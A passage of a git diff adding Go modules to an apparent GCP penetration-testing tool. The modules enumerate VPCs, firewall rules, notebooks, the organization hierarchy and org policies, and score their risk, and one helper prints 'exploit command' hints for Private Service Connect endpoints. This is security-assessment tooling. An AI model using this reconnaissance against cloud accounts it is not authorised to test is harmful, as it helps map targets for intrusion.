{ + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *NetworkEndpointsService) generatePSCExploitCommands(endpoint PrivateServiceConnectEndpoint) []string { + var commands []string + + commands = append(commands, + fmt.Sprintf("# PSC Endpoint: %s", endpoint.Name), + fmt.Sprintf("# IP Address: %s", endpoint.IPAddress), + fmt.Sprintf("# Network: %s", endpoint.Network), + ) + + if endpoint.TargetType == "google-apis" { + commands = append(commands, + "# This endpoint provides private access to Google APIs", + "# From instances in this VPC, access Google APIs via this IP:", + fmt.Sprintf("# curl -H 'Host: storage.googleapis.com' https://%s/storage/v1/b", endpoint.IPAddress), + ) + } else if endpoint.TargetType == "service-attachment" { + commands = append(commands, + "# This endpoint connects to a producer service", + fmt.Sprintf("# Target: %s", endpoint.Target), + fmt.Sprintf("# Connect from VPC instance to: %s", endpoint.IPAddress), + ) + } + + return commands +} + +func (s *NetworkEndpointsService) analyzeConnectionRisk(connection PrivateConnection) (string, []string) { + var reasons []string + score := 0 + + if len(connection.ReservedRanges) > 0 { + reasons = append(reasons, fmt.Sprintf("Has %d reserved IP range(s)", len(connection.ReservedRanges))) + score += 1 + } + + if len(connection.AccessibleServices) > 0 { + reasons = append(reasons, fmt.Sprintf("Provides access to: %s", strings.Join(connection.AccessibleServices, ", "))) + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { + // Map service names to what they provide access to + serviceMap := map[string][]string{ + "servicenetworking.googleapis.com": {"Cloud SQL", "Memorystore", "Filestore", "Cloud Build"}, + } + + if services, ok := serviceMap[service]; ok { + return services + } + return []string{service} +} + +func (s *NetworkEndpointsService) analyzeAttachmentRisk(attachment ServiceAttachment) (string, []string) { + var reasons []string + score := 0 + + if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { + reasons = append(reasons, "Auto-accepts connections from any project") + score += 2 + } + + if len(attachment.ConsumerAcceptLists) == 0 && attachment.ConnectionPreference == "ACCEPT_MANUAL" { + reasons = append(reasons, "No explicit accept list - manual review required") + score += 1 + } + + if attachment.ConnectedEndpoints > 0 { + reasons = append(reasons, fmt.Sprintf("Has %d connected consumer endpoint(s)", attachment.ConnectedEndpoints)) + score += 1 + } + + if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 30aa9a00..33257b39 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -270,5 +270,337 @@ func parseFirewallRule(fw *compute.Firewall, projectID string) (FirewallRule, er }, nil } -// TODO -// func (ns *NetworkService) ForwardingRules() {} +// VPCInfo holds VPC network details +type VPCInfo struct { + Name string + ProjectID string + Description string + AutoCreateSubnetworks bool + RoutingMode string // REGIONAL or GLOBAL + Mtu int64 + Subnetworks []string + Peerings []VPCPeering + CreationTime string +} + +// VPCPeering holds VPC peering details +type VPCPeering struct { + Name string + Network string + State string + ExportCustomRoutes bool + ImportCustomRoutes bool + ExchangeSubnetRoutes bool +} + +// SubnetInfo holds subnet details +type SubnetInfo struct { + Name string + ProjectID string + Region string + Network string + IPCidrRange string + GatewayAddress string + PrivateIPGoogleAccess bool + Purpose string + StackType string + CreationTime string +} + +// FirewallRuleInfo holds enhanced firewall rule details for security analysis +type FirewallRuleInfo struct { + Name string + ProjectID string + Description string + Network string + Priority int64 + Direction string // INGRESS or EGRESS + Disabled bool + + // Source/Destination + SourceRanges []string + SourceTags []string + SourceSAs []string + DestinationRanges []string + TargetTags []string + TargetSAs []string + + // Traffic + AllowedProtocols map[string][]string // protocol -> ports + DeniedProtocols map[string][]string + + // Security analysis + IsPublicIngress bool // 0.0.0.0/0 in source ranges + IsPublicEgress bool // 0.0.0.0/0 in destination ranges + AllowsAllPorts bool // Empty ports = all ports + RiskLevel string // HIGH, MEDIUM, LOW + SecurityIssues []string +} + +// Networks retrieves all VPC networks in a project +func (ns *NetwworkService) Networks(projectID string) ([]VPCInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var networks []VPCInfo + + networkList, err := computeService.Networks.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, network := range networkList.Items { + info := VPCInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + Mtu: network.Mtu, + Subnetworks: network.Subnetworks, + CreationTime: network.CreationTimestamp, + } + + // Parse peerings + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, VPCPeering{ + Name: peering.Name, + Network: peering.Network, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + }) + } + + networks = append(networks, info) + } + + return networks, nil +} + +// Subnets retrieves all subnets in a project +func (ns *NetwworkService) Subnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var subnets []SubnetInfo + + // List subnets across all regions + subnetList, err := computeService.Subnetworks.AggregatedList(projectID).Do() + if err != nil { + return nil, err + } + + for _, scopedList := range subnetList.Items { + for _, subnet := range scopedList.Subnetworks { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Region: extractRegionFromURL(subnet.Region), + Network: extractNameFromURL(subnet.Network), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + StackType: subnet.StackType, + CreationTime: subnet.CreationTimestamp, + } + subnets = append(subnets, info) + } + } + + return subnets, nil +} + +// FirewallRulesEnhanced retrieves firewall rules with security analysis +func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRuleInfo, error) { + ctx := context.Background() + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + + var rules []FirewallRuleInfo + + firewallList, err := computeService.Firewalls.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, fw := range firewallList.Items { + info := FirewallRuleInfo{ + Name: fw.Name, + ProjectID: projectID, + Description: fw.Description, + Network: extractNameFromURL(fw.Network), + Priority: fw.Priority, + Direction: fw.Direction, + Disabled: fw.Disabled, + SourceRanges: fw.SourceRanges, + SourceTags: fw.SourceTags, + SourceSAs: fw.SourceServiceAccounts, + DestinationRanges: fw.DestinationRanges, + TargetTags: fw.TargetTags, + TargetSAs: fw.TargetServiceAccounts, + AllowedProtocols: make(map[string][]string), + DeniedProtocols: make(map[string][]string), + } + + // Parse allowed protocols + for _, allowed := range fw.Allowed { + info.AllowedProtocols[allowed.IPProtocol] = allowed.Ports + if len(allowed.Ports) == 0 { + info.AllowsAllPorts = true + } + } + + // Parse denied protocols + for _, denied := range fw.Denied { + info.DeniedProtocols[denied.IPProtocol] = denied.Ports + } + + // Security analysis + analyzeFirewallRule(&info) + + rules = append(rules, info) + } + + return rules, nil +} + +// analyzeFirewallRule performs security analysis on a firewall rule +func analyzeFirewallRule(rule *FirewallRuleInfo) { + // Check for public ingress (0.0.0.0/0 in source ranges) + for _, source := range rule.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + rule.IsPublicIngress = true + break + } + } + + // Check for public egress + for _, dest := range rule.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + rule.IsPublicEgress = true + break + } + } + + // Determine risk level and security issues + if rule.Direction == "INGRESS" && rule.IsPublicIngress && len(rule.AllowedProtocols) > 0 { + // Check for high-risk configurations + for proto, ports := range rule.AllowedProtocols { + if len(ports) == 0 { + // All ports allowed + rule.SecurityIssues = append(rule.SecurityIssues, + "Allows all "+proto+" ports from 0.0.0.0/0") + rule.RiskLevel = "HIGH" + } else { + // Check for sensitive ports + for _, port := range ports { + if isSensitivePort(port) { + rule.SecurityIssues = append(rule.SecurityIssues, + "Exposes sensitive port "+port+" ("+proto+") to internet") + if rule.RiskLevel != "HIGH" { + rule.RiskLevel = "HIGH" + } + } + } + } + } + + if rule.RiskLevel == "" && rule.IsPublicIngress { + rule.RiskLevel = "MEDIUM" + rule.SecurityIssues = append(rule.SecurityIssues, "Allows ingress from 0.0.0.0/0") + } + } + + if rule.RiskLevel == "" { + rule.RiskLevel = "LOW" + } + + // Check if no target restrictions (applies to all instances) + if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 && rule.IsPublicIngress { + rule.SecurityIssues = append(rule.SecurityIssues, "No target restrictions - applies to ALL instances in network") + } +} + +// isSensitivePort checks if a port is considered sensitive +func isSensitivePort(port string) bool { + sensitivePorts := map[string]bool{ + "22": true, "3389": true, "5985": true, "5986": true, // Remote access + "3306": true, "5432": true, "1433": true, "1521": true, "27017": true, // Databases + "6379": true, "11211": true, // Caches + "9200": true, "9300": true, // Elasticsearch + "2379": true, "2380": true, // etcd + "8080": true, "8443": true, // Common web + "23": true, // Telnet + "21": true, "20": true, // FTP + "25": true, "587": true, "465": true, // SMTP + "110": true, "143": true, // POP3/IMAP + "445": true, "139": true, // SMB + "135": true, // RPC + } + return sensitivePorts[port] +} + +// Helper functions +func extractNameFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromURL(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +// GetComputeService returns a compute.Service instance for external use +func (ns *NetwworkService) GetComputeService(ctx context.Context) (*compute.Service, error) { + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return nil, err + } + return computeService, nil +} diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go new file mode 100644 index 00000000..8feab918 --- /dev/null +++ b/gcp/services/notebooksService/notebooksService.go @@ -0,0 +1,294 @@ +package notebooksservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + notebooks "google.golang.org/api/notebooks/v1" +) + +type NotebooksService struct { + session *gcpinternal.SafeSession +} + +func New() *NotebooksService { + return &NotebooksService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { + return &NotebooksService{session: session} +} + +// NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance +type NotebookInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + NoPublicIP bool `json:"noPublicIp"` + NoProxyAccess bool `json:"noProxyAccess"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Disk config + BootDiskType string `json:"bootDiskType"` + BootDiskSizeGB int64 `json:"bootDiskSizeGb"` + DataDiskType string `json:"dataDiskType"` + DataDiskSizeGB int64 `json:"dataDiskSizeGb"` + + // GPU config + AcceleratorType string `json:"acceleratorType"` + AcceleratorCount int64 `json:"acceleratorCount"` + + // Security config + InstallGpuDriver bool `json:"installGpuDriver"` + CustomContainer bool `json:"customContainer"` + + // Security analysis + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// RuntimeInfo represents a managed notebook runtime +type RuntimeInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + State string `json:"state"` + RuntimeType string `json:"runtimeType"` + MachineType string `json:"machineType"` + ServiceAccount string `json:"serviceAccount"` + Network string `json:"network"` + Subnet string `json:"subnet"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListInstances retrieves all notebook instances +func (s *NotebooksService) ListInstances(projectID string) ([]NotebookInstanceInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks service: %v", err) + } + + var instances []NotebookInstanceInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list notebook instances: %v", err) + } + + return instances, nil +} + +// ListRuntimes retrieves all managed notebook runtimes +func (s *NotebooksService) ListRuntimes(projectID string) ([]RuntimeInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks service: %v", err) + } + + var runtimes []RuntimeInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Runtimes.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListRuntimesResponse) error { + for _, runtime := range page.Runtimes { + info := s.parseRuntime(runtime, projectID) + runtimes = append(runtimes, info) + } + return nil + }) + if err != nil { + // Runtimes API might not be available in all regions + return runtimes, nil + } + + return runtimes, nil +} + +func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID string) NotebookInstanceInfo { + info := NotebookInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + State: instance.State, + MachineType: extractName(instance.MachineType), + CreateTime: instance.CreateTime, + UpdateTime: instance.UpdateTime, + RiskReasons: []string{}, + } + + // Service account + info.ServiceAccount = instance.ServiceAccount + + // Network config + info.Network = extractName(instance.Network) + info.Subnet = extractName(instance.Subnet) + info.NoPublicIP = instance.NoPublicIp + info.NoProxyAccess = instance.NoProxyAccess + + // Boot disk + info.BootDiskType = instance.BootDiskType + info.BootDiskSizeGB = instance.BootDiskSizeGb + + // Data disk + info.DataDiskType = instance.DataDiskType + info.DataDiskSizeGB = instance.DataDiskSizeGb + + // GPU config + if instance.AcceleratorConfig != nil { + info.AcceleratorType = instance.AcceleratorConfig.Type + info.AcceleratorCount = instance.AcceleratorConfig.CoreCount + } + info.InstallGpuDriver = instance.InstallGpuDriver + + // Custom container + if instance.ContainerImage != nil { + info.CustomContainer = true + } + + info.RiskLevel, info.RiskReasons = s.analyzeInstanceRisk(info) + + return info +} + +func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { + info := RuntimeInfo{ + Name: extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, + RiskReasons: []string{}, + } + + if runtime.VirtualMachine != nil { + info.RuntimeType = "VirtualMachine" + if runtime.VirtualMachine.VirtualMachineConfig != nil { + config := runtime.VirtualMachine.VirtualMachineConfig + info.MachineType = config.MachineType + info.Network = extractName(config.Network) + info.Subnet = extractName(config.Subnet) + } + } + + if runtime.AccessConfig != nil { + info.ServiceAccount = runtime.AccessConfig.RuntimeOwner + } + + info.RiskLevel, info.RiskReasons = s.analyzeRuntimeRisk(info) + + return info +} + +func (s *NotebooksService) analyzeInstanceRisk(instance NotebookInstanceInfo) (string, []string) { + var reasons []string + score := 0 + + // Public IP + if !instance.NoPublicIP { + reasons = append(reasons, "Has public IP address") + score += 2 + } + + // Proxy access enabled (allows web access) + if !instance.NoProxyAccess { + reasons = append(reasons, "Proxy access enabled (web access)") + score += 1 + } + + // Default service account + if instance.ServiceAccount == "" || strings.Contains(instance.ServiceAccount, "compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine service account") + score += 2 + } + + // Custom container (potential supply chain risk) + if instance.CustomContainer { + reasons = append(reasons, "Uses custom container image") + score += 1 + } + + // GPU (high-value target, expensive) + if instance.AcceleratorCount > 0 { + reasons = append(reasons, fmt.Sprintf("Has GPU attached (%s x%d)", instance.AcceleratorType, instance.AcceleratorCount)) + score += 1 + } + + if score >= 4 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func (s *NotebooksService) analyzeRuntimeRisk(runtime RuntimeInfo) (string, []string) { + var reasons []string + score := 0 + + // Check for default SA patterns + if runtime.ServiceAccount == "" { + reasons = append(reasons, "No explicit service account configured") + score += 1 + } + + if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go new file mode 100644 index 00000000..6d4fa72d --- /dev/null +++ b/gcp/services/organizationsService/organizationsService.go @@ -0,0 +1,453 @@ +package organizationsservice + +import ( + "context" + "fmt" + "strings" + + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" +) + +type OrganizationsService struct { + session *gcpinternal.SafeSession +} + +// New creates a new OrganizationsService +func New() *OrganizationsService { + return &OrganizationsService{} +} + +// NewWithSession creates an OrganizationsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *OrganizationsService { + return &OrganizationsService{session: session} +} + +// OrganizationInfo represents organization details +type OrganizationInfo struct { + Name string `json:"name"` // organizations/ORGANIZATION_ID + DisplayName string `json:"displayName"` + DirectoryID string `json:"directoryId"` // Cloud Identity directory ID + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// FolderInfo represents folder details +type FolderInfo struct { + Name string `json:"name"` // folders/FOLDER_ID + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// ProjectInfo represents project details +type ProjectInfo struct { + Name string `json:"name"` // projects/PROJECT_ID + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + Labels map[string]string `json:"labels"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// HierarchyNode represents a node in the resource hierarchy +type HierarchyNode struct { + Type string `json:"type"` // organization, folder, project + ID string `json:"id"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` + Children []HierarchyNode `json:"children"` + Depth int `json:"depth"` +} + +// SearchOrganizations searches for organizations accessible to the caller +func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) { + ctx := context.Background() + var client *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create organizations client: %v", err) + } + defer client.Close() + + var orgs []OrganizationInfo + + req := &resourcemanagerpb.SearchOrganizationsRequest{} + it := client.SearchOrganizations(ctx, req) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to search organizations: %v", err) + } + + orgInfo := OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + State: org.State.String(), + } + if org.CreateTime != nil { + orgInfo.CreateTime = org.CreateTime.AsTime().String() + } + if org.UpdateTime != nil { + orgInfo.UpdateTime = org.UpdateTime.AsTime().String() + } + if org.DeleteTime != nil { + orgInfo.DeleteTime = org.DeleteTime.AsTime().String() + } + + orgs = append(orgs, orgInfo) + } + + return orgs, nil +} + +// SearchFolders searches for folders under a given parent +func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create folders client: %v", err) + } + defer client.Close() + + var folders []FolderInfo + + // Search for folders under the given parent + query := fmt.Sprintf("parent=%s", parent) + req := &resourcemanagerpb.SearchFoldersRequest{ + Query: query, + } + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to search folders: %v", err) + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchAllFolders searches for all accessible folders +func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create folders client: %v", err) + } + defer client.Close() + + var folders []FolderInfo + + req := &resourcemanagerpb.SearchFoldersRequest{} + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to search folders: %v", err) + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchProjects searches for projects +func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, error) { + ctx := context.Background() + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create projects client: %v", err) + } + defer client.Close() + + var projects []ProjectInfo + + query := "" + if parent != "" { + query = fmt.Sprintf("parent=%s", parent) + } + req := &resourcemanagerpb.SearchProjectsRequest{ + Query: query, + } + it := client.SearchProjects(ctx, req) + for { + project, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, fmt.Errorf("failed to search projects: %v", err) + } + + projectInfo := ProjectInfo{ + Name: project.Name, + ProjectID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State.String(), + Labels: project.Labels, + } + if project.CreateTime != nil { + projectInfo.CreateTime = project.CreateTime.AsTime().String() + } + if project.UpdateTime != nil { + projectInfo.UpdateTime = project.UpdateTime.AsTime().String() + } + if project.DeleteTime != nil { + projectInfo.DeleteTime = project.DeleteTime.AsTime().String() + } + + projects = append(projects, projectInfo) + } + + return projects, nil +} + +// GetProjectAncestry returns the ancestry path from project to organization +func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]HierarchyNode, error) { + ctx := context.Background() + + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create projects client: %v", err) + } + defer projectsClient.Close() + + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create folders client: %v", err) + } + defer foldersClient.Close() + + var ancestry []HierarchyNode + resourceID := "projects/" + projectID + + for { + if strings.HasPrefix(resourceID, "organizations/") { + orgID := strings.TrimPrefix(resourceID, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: resourceID, + }) + break + } else if strings.HasPrefix(resourceID, "folders/") { + folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) + if err != nil { + break + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + ancestry = append(ancestry, HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + resourceID = folder.Parent + } else if strings.HasPrefix(resourceID, "projects/") { + project, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) + if err != nil { + break + } + ancestry = append(ancestry, HierarchyNode{ + Type: "project", + ID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + }) + resourceID = project.Parent + } else { + break + } + } + + // Reverse to go from organization to project + for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { + ancestry[i], ancestry[j] = ancestry[j], ancestry[i] + } + + // Set depth + for i := range ancestry { + ancestry[i].Depth = i + } + + return ancestry, nil +} + +// BuildHierarchy builds a complete hierarchy tree +func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { + // Get organizations + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + var roots []HierarchyNode + + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNode := HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + Depth: 0, + Children: []HierarchyNode{}, + } + + // Get folders under this org + s.buildFolderTree(&orgNode, org.Name, 1) + + // Get projects directly under org + projects, err := s.SearchProjects(org.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: 1, + } + orgNode.Children = append(orgNode.Children, projNode) + } + } + + roots = append(roots, orgNode) + } + + return roots, nil +} + +// buildFolderTree recursively builds folder tree +func (s *OrganizationsService) buildFolderTree(parent *HierarchyNode, parentName string, depth int) { + folders, err := s.SearchFolders(parentName) + if err != nil { + return + } + + for _, folder := range folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNode := HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + Depth: depth, + Children: []HierarchyNode{}, + } + + // Recursively get child folders + s.buildFolderTree(&folderNode, folder.Name, depth+1) + + // Get projects under this folder + projects, err := s.SearchProjects(folder.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: depth + 1, + } + folderNode.Children = append(folderNode.Children, projNode) + } + } + + parent.Children = append(parent.Children, folderNode) + } +} diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go new file mode 100644 index 00000000..73f39f9d --- /dev/null +++ b/gcp/services/orgpolicyService/orgpolicyService.go @@ -0,0 +1,282 @@ +package orgpolicyservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/orgpolicy/v2" +) + +type OrgPolicyService struct { + session *gcpinternal.SafeSession +} + +func New() *OrgPolicyService { + return &OrgPolicyService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService { + return &OrgPolicyService{session: session} +} + +// OrgPolicyInfo represents an organization policy with security analysis +type OrgPolicyInfo struct { + Name string `json:"name"` + Constraint string `json:"constraint"` + ProjectID string `json:"projectId"` + Enforced bool `json:"enforced"` + AllowAll bool `json:"allowAll"` + DenyAll bool `json:"denyAll"` + AllowedValues []string `json:"allowedValues"` + DeniedValues []string `json:"deniedValues"` + InheritParent bool `json:"inheritFromParent"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + SecurityImpact string `json:"securityImpact"` +} + +// SecurityRelevantConstraints maps constraint names to their security implications +var SecurityRelevantConstraints = map[string]struct { + Description string + RiskWhenWeak string + DefaultSecure bool +}{ + // Domain restriction + "constraints/iam.allowedPolicyMemberDomains": { + Description: "Restricts IAM members to specific domains", + RiskWhenWeak: "Allows external users/accounts to be granted IAM permissions", + DefaultSecure: false, + 